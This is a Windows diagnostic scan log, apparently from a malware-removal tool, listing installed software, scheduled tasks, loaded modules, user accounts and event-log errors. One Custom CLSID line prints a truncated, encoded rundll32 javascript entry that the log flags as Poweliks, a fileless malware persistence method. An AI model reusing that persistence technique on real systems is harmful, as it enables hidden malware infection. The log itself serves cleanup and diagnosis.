TTLEditor 1.4 (HKLM-x32\...\{A1BFEB7F-3126-4F60-9CFD-8D4FC1B87BEB}_is1) (Version:  - LogMeTT.com)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Update for Microsoft .NET Framework 4 Client Profile (KB2468871) (HKLM-x32\...\{F5B09CFD-F0B2-36AF-8DF4-1DF6B63FC7B4}.KB2468871) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2533523) (HKLM-x32\...\{F5B09CFD-F0B2-36AF-8DF4-1DF6B63FC7B4}.KB2533523) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2600217) (HKLM-x32\...\{F5B09CFD-F0B2-36AF-8DF4-1DF6B63FC7B4}.KB2600217) (Version: 1 - Microsoft Corporation)
Update for Microsoft Office 2007 Help for Common Features (KB963673) (HKLM-x32\...\{90120000-006E-0409-0000-0000000FF1CE}_ENTERPRISER_{AB365889-0395-4FAD-B702-CA5985D53D42}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2596620) 32-Bit Edition (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{A024FC7B-77DE-45DE-A058-1C049A17BFB3}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2687493) 32-Bit Edition (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{6FAA03BD-2B51-4029-9AD9-64A3B8E3C84C}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2767849) 32-Bit Edition (HKLM-x32\...\{90120000-002A-0000-1000-0000000FF1CE}_ENTERPRISER_{CB68A5B0-3508-4193-AEB9-AF636DAECE0F}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2767849) 32-Bit Edition (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{CB68A5B0-3508-4193-AEB9-AF636DAECE0F}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2767916) 32-Bit Edition (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{E9A82945-BA29-4EE8-8F2A-2F49545E9CF2}) (Version:  - Microsoft)
Update for Microsoft Office Access 2007 Help (KB963663) (HKLM-x32\...\{90120000-0015-0409-0000-0000000FF1CE}_ENTERPRISER_{6B76A18A-AA1E-42AB-A7AD-6C84BBB43987}) (Version:  - Microsoft)
Update for Microsoft Office Excel 2007 Help (KB963678) (HKLM-x32\...\{90120000-0016-0409-0000-0000000FF1CE}_ENTERPRISER_{199DF7B6-169C-448C-B511-1054101BE9C9}) (Version:  - Microsoft)
Update for Microsoft Office Infopath 2007 Help (KB963662) (HKLM-x32\...\{90120000-0044-0409-0000-0000000FF1CE}_ENTERPRISER_{716B81B8-B13C-41DF-8EAC-7A2F656CAB63}) (Version:  - Microsoft)
Update for Microsoft Office OneNote 2007 Help (KB963670) (HKLM-x32\...\{90120000-00A1-0409-0000-0000000FF1CE}_ENTERPRISER_{2744EF05-38E1-4D5D-B333-E021EDAEA245}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 (KB2687404) 32-Bit Edition (HKLM-x32\...\{90120000-001A-0409-0000-0000000FF1CE}_ENTERPRISER_{ED38F8A3-4F61-494E-8BCA-E3AC7760C924}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 Help (KB963677) (HKLM-x32\...\{90120000-001A-0409-0000-0000000FF1CE}_ENTERPRISER_{0451F231-E3E3-4943-AB9F-58EB96171784}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 Junk Email Filter (KB2850085) 32-Bit Edition (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{128A5449-CF71-4DA4-A746-F49E3B5DB584}) (Version:  - Microsoft)
Update for Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM-x32\...\{90120000-0018-0409-0000-0000000FF1CE}_ENTERPRISER_{397B1D4F-ED7B-4ACA-A637-43B670843876}) (Version:  - Microsoft)
Update for Microsoft Office Publisher 2007 Help (KB963667) (HKLM-x32\...\{90120000-0019-0409-0000-0000000FF1CE}_ENTERPRISER_{2E40DE55-B289-4C8B-8901-5D369B16814F}) (Version:  - Microsoft)
Update for Microsoft Office Script Editor Help (KB963671) (HKLM-x32\...\{90120000-006E-0409-0000-0000000FF1CE}_ENTERPRISER_{CD11C6A2-FFC6-4271-8EAB-79C3582F505C}) (Version:  - Microsoft)
Update for Microsoft Office Word 2007 Help (KB963665) (HKLM-x32\...\{90120000-001B-0409-0000-0000000FF1CE}_ENTERPRISER_{80E762AA-C921-4839-9D7D-DB62A72C0726}) (Version:  - Microsoft)
Vegas Movie Studio Platinum 9.0 (HKLM-x32\...\{97E038E1-41AD-4C93-BCDC-6A2394AEE352}) (Version: 9.0.92 - Sony)
Video Surveillance Client 2.0 (HKLM-x32\...\Video Surveillance Client_is1) (Version:  - )
Visual C++ 8.0 Runtime Setup Package (x64) (HKLM-x32\...\{2FDBBCEA-62DB-45F4-B6E5-0E1FB2A1F29D}) (Version: 9.0.0.623 - AVG Technologies CZ, s.r.o.)
Visual Studio 2010 x64 Redistributables (HKLM\...\{21B133D6-5979-47F0-BE1C-F6A6B304693F}) (Version: 13.0.0.1 - AVG Technologies)
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
VLC media player 2.1.3 (HKLM-x32\...\VLC media player) (Version: 2.1.3 - VideoLAN)
VueScan (HKLM-x32\...\VueScan) (Version:  - )
Windows Live Communications Platform (x32 Version: 14.0.8098.930 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite_Wave3) (Version: 14.0.8089.0726 - Microsoft Corporation)
Windows Live Essentials (x32 Version: 14.0.8089.726 - Microsoft Corporation) Hidden
Windows Live Mail (x32 Version: 14.0.8089.0726 - Microsoft Corporation) Hidden
Windows Live Sign-in Assistant (HKLM-x32\...\{45338B07-A236-4270-9A77-EBB4115517B5}) (Version: 5.000.818.5 - Microsoft Corporation)
Windows Live Upload Tool (HKLM-x32\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
Windows Movie Maker 2.6 (HKLM-x32\...\{B3DAF54F-DB25-4586-9EF1-96D24BB14088}) (Version: 2.6.4037.0 - Microsoft Corporation)
WinPcap 4.1.1 (HKLM-x32\...\WinPcapInst) (Version: 4.1.0.1753 - CACE Technologies)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-2804656215-4255892301-2232998820-1003_Classes\CLSID\{083f5ae0-2b0a-11dd-bd0b-0800200c9a66}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2804656215-4255892301-2232998820-1003_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?

==================== Restore Points  =========================

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2014-10-17 21:59 - 00000698 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 localhost

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {173F9B60-3601-47D6-A216-2FC5B226644A} - System32\Tasks\CLMLSvc => c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMLSvc.exe [2009-12-01] (CyberLink)
Task: {21B562EA-F6BD-44E5-ACD7-67A549B26314} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-24] (Adobe Systems Incorporated)
Task: {27B73950-ED39-459B-8513-61473ECF0DA6} - System32\Tasks\ROC_PAID_JAN2013_TB_rmv => C:\Program Files (x86)\AVG Secure Search\PostInstall\ROC.exe
Task: {3DE8C2ED-A926-427B-ADD3-9C69512F4A47} - System32\Tasks\Core Temp Autostart => C:\Program Files\Core Temp\Core Temp.exe [2010-07-02] ()
Task: {67BB9479-55B0-4DCD-B55E-B082105327B3} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search &amp; Destroy 2\SDUpdate.exe
Task: {6CAA594D-199B-4BCD-AFED-F64B3CED62BE} - System32\Tasks\DVDAgent => c:\Program Files (x86)\Hewlett-Packard\Media\DVD\DVDAgent.exe [2009-10-20] (CyberLink Corp.)
Task: {81539C7F-8EF7-4D85-B187-D5DDD4F73AB4} - System32\Tasks\PCDRScheduledMaintenance => C:\Program Files\PC-Doctor for Windows\pcdr5cuiw32.exe [2009-07-02] (PC-Doctor, Inc.)
Task: {89E48B7F-9C8D-4749-972D-7240241E609F} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search &amp; Destroy 2\SDScan.exe
Task: {95C3FBE0-ED43-46ED-BBCD-64681B50E566} - System32\Tasks\AdobeAAMUpdater-1.0-Jim-PC-Jim => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2011-06-16] (Adobe Systems Incorporated)
Task: {A77CC17E-09E3-44BC-A51F-06BAB861194B} - System32\Tasks\Microsoft\Windows\WindowsBackup\AutomaticBackup => Rundll32.exe /d sdengin2.dll,ExecuteScheduledBackup
Task: {C5FA3822-ABC0-485E-9A77-2245EA38BDF1} - System32\Tasks\ROC_JAN2013_TB_rmv => C:\Program Files (x86)\AVG Secure Search\PostInstall\ROC.exe
Task: {E8A687B6-0CAF-4649-B886-2E3F16CD0204} - System32\Tasks\HPCeeScheduleForJP => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2010-09-13] (Hewlett-Packard)
Task: {EC3955D5-248E-465C-BD6B-AB1A8B32DC47} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search &amp; Destroy 2\SDImmunize.exe
Task: {F9AB9C66-47DF-4A85-A491-857127F0FD1D} - System32\Tasks\{3120572B-0A91-4C3D-9EA8-F374BB3519C2} => C:\Program Files (x86)\ImgBurn\ImgBurn.exe [2011-10-03] (LIGHTNING UK!)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\HPCeeScheduleForJP.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
Task: C:\Windows\Tasks\PCDRScheduledMaintenance.job => C:\Program Files\PC-Doctor for Windows\pcdr5cuiw32.exe
Task: C:\Windows\Tasks\ROC_JAN2013_TB_rmv.job => C:\Program Files (x86)\AVG Secure Search\PostInstall\ROC.exe
Task: C:\Windows\Tasks\ROC_PAID_JAN2013_TB_rmv.job => C:\Program Files (x86)\AVG Secure Search\PostInstall\ROC.exe

==================== Loaded Modules (whitelisted) =============

2007-08-20 12:42 - 2007-08-20 12:42 - 01282048 _____ () C:\Program Files (x86)\Silicon Image\57xx SteelVine\SteelVine.exe
2014-05-18 18:29 - 2013-03-02 12:03 - 02038784 _____ () C:\Program Files (x86)\Single Video Surveillance Client\AntsSTSService.exe
2009-12-03 18:24 - 2008-09-30 21:59 - 00192512 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Easy Backup\HPBtnSrv.exe
2014-05-18 18:29 - 2012-07-04 10:52 - 06562432 _____ () C:\Program Files\MySQL\MySQL Server 5.1\bin\mysqld.exe
2009-07-08 17:35 - 2009-07-08 17:35 - 00610360 _____ () C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe
2012-05-31 22:46 - 2012-02-18 14:17 - 00006144 _____ () C:\Users\JP\AppData\Local\Microsoft\Windows Sidebar\Gadgets\All_CPU_Meter_V3.9.gadget\CoreTempReader.dll
2012-05-31 22:46 - 2012-02-18 14:17 - 00008704 _____ () C:\Users\JP\AppData\Local\Microsoft\Windows Sidebar\Gadgets\All_CPU_Meter_V3.9.gadget\GetCoreTempInfoNET.dll
2012-05-31 22:46 - 2012-02-18 14:17 - 00007680 _____ () C:\Users\JP\AppData\Local\Microsoft\Windows Sidebar\Gadgets\All_CPU_Meter_V3.9.gadget\SystemInfo.dll
2012-02-18 14:17 - 2010-07-02 14:52 - 00530448 _____ () C:\Program Files\Core Temp\Core Temp.exe
2007-08-20 12:45 - 2007-08-20 12:45 - 01720320 _____ () C:\Program Files (x86)\Silicon Image\57xx SteelVine\SteelVineManager.exe
2012-04-05 22:00 - 2012-04-05 22:00 - 00369152 _____ () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
2006-09-08 14:32 - 2006-09-08 14:32 - 01720320 _____ () C:\Program Files (x86)\Silicon Image\57xx SteelVine\QtCore4.dll
2006-09-08 14:44 - 2006-09-08 14:44 - 02224128 _____ () C:\Program Files (x86)\Silicon Image\57xx SteelVine\Qt3Support4.dll
2006-09-08 14:41 - 2006-09-08 14:41 - 00409600 _____ () C:\Program Files (x86)\Silicon Image\57xx SteelVine\QtSql4.dll
2006-09-08 14:32 - 2006-09-08 14:32 - 00204800 _____ () C:\Program Files (x86)\Silicon Image\57xx SteelVine\QtXml4.dll
2006-09-08 14:40 - 2006-09-08 14:40 - 03969024 _____ () C:\Program Files (x86)\Silicon Image\57xx SteelVine\QtGui4.dll
2006-09-08 14:41 - 2006-09-08 14:41 - 00249856 _____ () C:\Program Files (x86)\Silicon Image\57xx SteelVine\QtNetwork4.dll
2014-05-18 18:29 - 2012-02-27 18:05 - 00047024 _____ () C:\Program Files (x86)\Single Video Surveillance Client\avcdec.dll
2014-05-18 18:29 - 2012-02-27 18:06 - 00446464 _____ () C:\Program Files (x86)\Single Video Surveillance Client\NETSDK.DLL
2014-05-18 18:29 - 2012-02-27 18:06 - 00032768 _____ () C:\Program Files (x86)\Single Video Surveillance Client\tmAudio.dll
2014-05-18 18:29 - 2012-02-27 18:06 - 00139337 _____ () C:\Program Files (x86)\Single Video Surveillance Client\hpr.dll
2014-05-18 18:29 - 2012-02-27 18:05 - 00782336 _____ () C:\Program Files (x86)\Single Video Surveillance Client\dhnetsdk.dll
2014-05-18 18:29 - 2012-02-27 18:05 - 00466944 _____ () C:\Program Files (x86)\Single Video Surveillance Client\dhplay.dll
2014-05-18 18:29 - 2012-02-27 18:05 - 00278528 _____ () C:\Program Files (x86)\Single Video Surveillance Client\dhdvr.dll
2014-05-18 18:29 - 2012-09-10 15:14 - 00212992 _____ () C:\Program Files (x86)\Single Video Surveillance Client\Inhot.dll
2014-05-18 18:29 - 2011-08-18 17:54 - 01409550 _____ () C:\Program Files (x86)\Single Video Surveillance Client\avcodec-53.dll
2014-05-18 18:29 - 2011-08-18 17:54 - 00100366 _____ () C:\Program Files (x86)\Single Video Surveillance Client\avutil-51.dll
2014-05-18 18:29 - 2011-08-18 17:54 - 00183310 _____ () C:\Program Files (x86)\Single Video Surveillance Client\swscale-2.dll
2014-05-18 18:29 - 2011-09-07 14:19 - 00475648 _____ () C:\Program Files (x86)\Single Video Surveillance Client\D3DVideoRender.dll
2014-05-18 18:29 - 2012-11-24 10:35 - 01236480 _____ () C:\Program Files (x86)\Single Video Surveillance Client\ants_codec.dll
2014-05-18 18:29 - 2012-02-27 18:06 - 00417792 _____ () C:\Program Files (x86)\Single Video Surveillance Client\zlplaysdk.dll
2014-05-18 18:29 - 2012-03-08 16:18 - 00544768 _____ () C:\Program Files (x86)\Single Video Surveillance Client\JBNVSDK.dll
2014-05-18 18:29 - 2012-02-27 18:06 - 00229376 _____ () C:\Program Files (x86)\Single Video Surveillance Client\HHNetClient.dll
2014-05-18 18:29 - 2012-11-19 10:32 - 00630784 _____ () C:\Program Files (x86)\Single Video Surveillance Client\TDHZNetSDK.dll
2014-05-18 18:29 - 2011-12-16 16:12 - 00053248 _____ () C:\Program Files (x86)\Single Video Surveillance Client\HISDK.dll
2014-05-18 18:29 - 2012-02-22 10:47 - 00155648 _____ () C:\Program Files (x86)\Single Video Surveillance Client\NetLib.dll
2014-05-18 18:29 - 2012-01-11 15:38 - 00798720 _____ () C:\Program Files (x86)\Single Video Surveillance Client\HIPlayer.dll
2014-05-18 18:29 - 2012-02-27 18:06 - 01318912 _____ () C:\Program Files (x86)\Single Video Surveillance Client\LIBMYSQL.dll
2014-05-18 18:29 - 2012-02-27 18:06 - 00200704 _____ () C:\Program Files (x86)\Single Video Surveillance Client\Netplay_H264.dll
2014-05-18 18:29 - 2012-02-27 18:06 - 00069632 _____ () C:\Program Files (x86)\Single Video Surveillance Client\SoundOut_H264.dll
2014-05-18 18:29 - 2011-07-01 01:51 - 00544768 _____ () C:\Program Files (x86)\Single Video Surveillance Client\XM\NetSdk.dll
2014-10-17 22:42 - 2014-05-13 12:04 - 00109400 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlThirdParty150.bpl
2014-10-17 22:42 - 2014-05-13 12:04 - 00416600 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\DEC150.bpl
2010-07-07 20:33 - 2010-07-07 20:33 - 00002560 _____ () C:\Windows\SysWOW64\CTXFIRES.DLL
2009-12-01 20:49 - 2009-12-01 20:49 - 00931112 ____N () c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMediaLibrary.dll
2012-08-02 22:19 - 2009-06-29 10:54 - 00164864 _____ () C:\Windows\SysWOW64\APOMngr.DLL
2013-12-20 14:01 - 2013-12-20 14:01 - 00170496 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\IsdiInterop\44bfa824a3b8a6f789fda79a2e01a8db\IsdiInterop.ni.dll
2010-06-11 17:27 - 2010-03-03 20:08 - 00058880 _____ () C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IsdiInterop.dll
2014-10-17 22:42 - 2014-05-13 12:04 - 00167768 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlFileFormats150.bpl
2014-10-17 22:42 - 2012-08-23 10:38 - 00574840 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\sqlite3.dll
2014-10-17 22:42 - 2012-04-03 17:06 - 00565640 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\av\BDSmartDB.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\ProgramData\Temp:56E2E879

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

MSCONFIG\startupreg: GrooveMonitor => "C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe"
MSCONFIG\startupreg: NeroFilterCheck => C:\Windows\system32\NeroCheck.exe
MSCONFIG\startupreg: Share-to-Web Namespace Daemon => C:\Program Files (x86)\Hewlett-Packard\HP Share-to-Web\hpgs2wnd.exe

========================= Accounts: ==========================

Administrator (S-1-5-21-2804656215-4255892301-2232998820-500 - Administrator - Disabled)
Guest (S-1-5-21-2804656215-4255892301-2232998820-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2804656215-4255892301-2232998820-1002 - Limited - Enabled)
JP (S-1-5-21-2804656215-4255892301-2232998820-1003 - Administrator - Enabled) => C:\Users\JP
JR (S-1-5-21-2804656215-4255892301-2232998820-1004 - Administrator - Enabled) => C:\Users\JR

==================== Faulty Device Manager Devices =============

Name: AMD High Definition Audio Device
Description: AMD High Definition Audio Device
Class Guid: {4d36e96c-e325-11ce-bfc1-08002be10318}
Manufacturer: Advanced Micro Devices
Service: AtiHDAudioService
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

==================== Event log errors: =========================

Application errors:
==================
Error: (10/19/2014 01:49:31 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DAP.exe, version: 10.0.6.0, time stamp: 0x00000000
Faulting module name: ntdll.dll, version: 6.1.7601.18229, time stamp: 0x51fb1072
Exception code: 0xc0150010
Fault offset: 0x0008482b
Faulting process id: 0x%9
Faulting application start time: 0xDAP.exe0
Faulting application path: DAP.exe1
Faulting module path: DAP.exe2
Report Id: DAP.exe3

Error: (10/19/2014 01:18:53 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DAP.exe, version: 10.0.6.0, time stamp: 0x00000000
Faulting module name: ntdll.dll, version: 6.1.7601.18229, time stamp: 0x51fb1072
Exception code: 0xc0150010
Fault offset: 0x0008482b
Faulting process id: 0x%9
Faulting application start time: 0xDAP.exe0
Faulting application path: DAP.exe1
Faulting module path: DAP.exe2
Report Id: DAP.exe3

Error: (10/19/2014 01:16:07 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DAP.exe, version: 10.0.6.0, time stamp: 0x00000000
Faulting module name: ntdll.dll, version: 6.1.7601.18229, time stamp: 0x51fb1072
Exception code: 0xc0150010
Fault offset: 0x0008482b
Faulting process id: 0x%9
Faulting application start time: 0xDAP.exe0
Faulting application path: DAP.exe1
Faulting module path: DAP.exe2
Report Id: DAP.exe3

Error: (10/19/2014 01:11:54 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DAP.exe, version: 10.0.6.0, time stamp: 0x00000000
Faulting module name: ntdll.dll, version: 6.1.7601.18229, time stamp: 0x51fb1072
Exception code: 0xc0150010
Fault offset: 0x0008482b
Faulting process id: 0x%9
Faulting application start time: 0xDAP.exe0
Faulting application path: DAP.exe1
Faulting module path: DAP.exe2
Report Id: DAP.exe3

Error: (10/19/2014 00:59:25 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DAP.exe, version: 10.0.6.0, time stamp: 0x00000000
Faulting module name: ntdll.dll, version: 6.1.7601.18229, time stamp: 0x51fb1072
Exception code: 0xc0150010
Fault offset: 0x0008482b
Faulting process id: 0x%9
Faulting application start time: 0xDAP.exe0
Faulting application path: DAP.exe1
Faulting module path: DAP.exe2
Report Id: DAP.exe3

Error: (10/19/2014 00:40:10 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DAP.EXE, version: 10.0.6.0, time stamp: 0x00000000
Faulting module name: ntdll.dll, version: 6.1.7601.18229, time stamp: 0x51fb1072
Exception code: 0xc0150010
Fault offset: 0x0008482b
Faulting process id: 0x%9
Faulting application start time: 0xDAP.EXE0
Faulting application path: DAP.EXE1
Faulting module path: DAP.EXE2
Report Id: DAP.EXE3

Error: (10/19/2014 00:06:57 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program DAP.EXE version 10.0.6.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 2f14

Start Time: 01cfeb591fccfce7

Termination Time: 23796

Application Path: C:\Program Files (x86)\DAP\DAP.EXE

Report Id: aea0ae3e-574d-11e4-b0bd-90e6baec3a60

Error: (10/18/2014 11:56:28 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DAP.exe, version: 10.0.6.0, time stamp: 0x00000000
Faulting module name: ntdll.dll, version: 6.1.7601.18229, time stamp: 0x51fb1072
Exception code: 0xc0150010
Fault offset: 0x0008482b
Faulting process id: 0x%9
Faulting application start time: 0xDAP.exe0
Faulting application path: DAP.exe1
Faulting module path: DAP.exe2
Report Id: DAP.exe3

Error: (10/18/2014 11:53:02 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DAP.exe, version: 10.0.6.0, time stamp: 0x00000000
Faulting module name: ntdll.dll, version: 6.1.7601.18229, time stamp: 0x51fb1072
Exception code: 0xc0150010
Fault offset: 0x0008482b
Faulting process id: 0x%9
Faulting application start time: 0xDAP.exe0
Faulting application path: DAP.exe1
Faulting module path: DAP.exe2
Report Id: DAP.exe3

Error: (10/18/2014 11:44:32 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DAP.EXE, version: 10.0.6.0, time stamp: 0x00000000
Faulting module name: ntdll.dll, version: 6.1.7601.18229, time stamp: 0x51fb1072
Exception code: 0xc0150010
Fault offset: 0x0008482b
Faulting process id: 0x%9
Faulting application start time: 0xDAP.EXE0
Faulting application path: DAP.EXE1
Faulting module path: DAP.EXE2
Report Id: DAP.EXE3

System errors:
=============
Error: (10/20/2014 09:06:43 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Spybot-S&D 2 Scanner Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 60000 milliseconds: Restart the service.

Error: (10/20/2014 09:06:37 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Spybot-S&D 2 Updating Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 60000 milliseconds: Restart the service.

Error: (10/20/2014 08:21:12 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (10/20/2014 08:20:08 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Spybot-S&D 2 Scanner Service service failed to start due to the following error:
%%1053

Error: (10/20/2014 08:20:08 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Spybot-S&D 2 Scanner Service service to connect.

Error: (10/19/2014 04:03:40 AM) (Source: Service Control Manager) (EventID: 7006) (User: )
Description: The ScRegSetValueExW call failed for FailureActions with the following error:
%%5

Error: (10/19/2014 03:03:32 AM) (Source: JRAID) (EventID: 15) (User: )
Description: The device, \Device\Scsi\JRAID1, is not ready for access yet.

Error: (10/19/2014 03:03:32 AM) (Source: Disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.

Error: (10/19/2014 03:03:32 AM) (Source: JRAID) (EventID: 15) (User: )
Description: The device, \Device\Scsi\JRAID1, is not ready for access yet.

Error: (10/19/2014 03:03:29 AM) (Source: Disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.

Microsoft Office Sessions:
=========================
Error: (07/16/2014 00:45:15 AM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6680.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 49 seconds with 0 seconds of active time.  This session ended with a crash.

Error: (12/29/2013 06:21:22 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6680.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 65 seconds with 60 seconds of active time.  This session ended with a crash.

Error: (11/15/2013 09:46:47 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6668.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 1065 seconds with 1020 seconds of active time.  This session ended with a crash.

Error: (10/29/2013 00:08:30 AM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6668.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 35 seconds with 0 seconds of active time.  This session ended with a crash.

Error: (08/02/2013 09:06:29 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6668.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 3602 seconds with 1980 seconds of active time.  This session ended with a crash.

Error: (06/24/2013 11:08:23 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6668.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 388 seconds with 360 seconds of active time.  This session ended with a crash.

Error: (04/26/2013 05:29:18 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6665.5003, Microsoft Office Version: 12.0.6612.1000. This session lasted 135 seconds with 120 seconds of active time.  This session ended with a crash.

Error: (11/17/2012 10:44:45 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6607.1000, Microsoft Office Version: 12.0.6612.1000. This session lasted 85 seconds with 60 seconds of active time.  This session ended with a crash.

Error: (04/29/2012 10:11:00 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6607.1000, Microsoft Office Version: 12.0.6612.1000. This session lasted 15 seconds with 0 seconds of active time.  This session ended with a crash.

Error: (04/28/2012 05:52:19 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
